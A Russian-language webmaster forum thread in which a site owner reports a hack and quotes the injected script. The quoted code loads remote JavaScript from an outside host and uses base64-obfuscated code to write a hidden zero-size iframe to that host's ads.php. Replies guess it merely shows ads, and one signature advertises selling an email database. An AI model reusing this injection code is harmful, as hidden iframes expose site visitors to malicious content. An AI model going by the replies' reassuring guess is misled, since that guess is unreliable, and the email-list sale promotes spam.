Взломали, подскажите что за код?

CJ
На сайте с 29.06.2005
Offline
106
427

Взломали, вставили код на главную:

<script type="text/javascript" src="http://emploi.ouedkniss.com/v1.00000/images/image_entreprise/0/tds/flash.js"></script>

по ссылке http://emploi.ouedkniss.com/v1.00000/images/image_entreprise/0/tds/flash.js грузится:

document.write('<script src="http://emploi.ouedkniss.com/v1.00000/images/image_entreprise/0/tds/ads.php?fork=1"></script>');

отсюда видим:

function base64_decode(data){ var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; var o1, o2, o3, h1, h2, h3, h4, bits, i=0, enc=''; do { h1 = b64.indexOf(data.charAt(i++)); h2 = b64.indexOf(data.charAt(i++)); h3 = b64.indexOf(data.charAt(i++)); h4 = b64.indexOf(data.charAt(i++)); bits = h1<<18 | h2<<12 | h3<<6 | h4; o1 = bits>>16 & 0xff; o2 = bits>>8 & 0xff; o3 = bits & 0xff; if (h3 == 64) enc += String.fromCharCode(o1); else if (h4 == 64) enc += String.fromCharCode(o1, o2); else enc += String.fromCharCode(o1, o2, o3); } while (i < data.length); return enc; } var bitUserAgent = navigator.userAgent.toLowerCase(); strictUA = (bitUserAgent.indexOf("chrome") != -1); $_ = base64_decode('PElGUkFNRQ=='); $___ = base64_decode('PC9JRlJBTUU+'); $__ = ' \x66\x72\x61\x6D\x65border=0 marginwidth=0 marginheight=0 width=0 height=0 style="overflow:hidden;" SRC="http://emploi.ouedkniss.com/v1.00000/images/image_entreprise/0/tds/ads.php'; $____ = '">'; document.write($_+$__+$____+$___);

Подскажите что этот код позволяет сделать злоумышленнику?

SF
На сайте с 12.11.2011
Offline
103
#1

Видимо показывать свою рекламу на вашем сайте как я понял.

Oshparennij
На сайте с 14.01.2008
Offline
174
#2

Спамят через Вас... возможно... Свой сайт рекламируют!

Продам базу email (usa), валид 99%. Пишите в личку.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий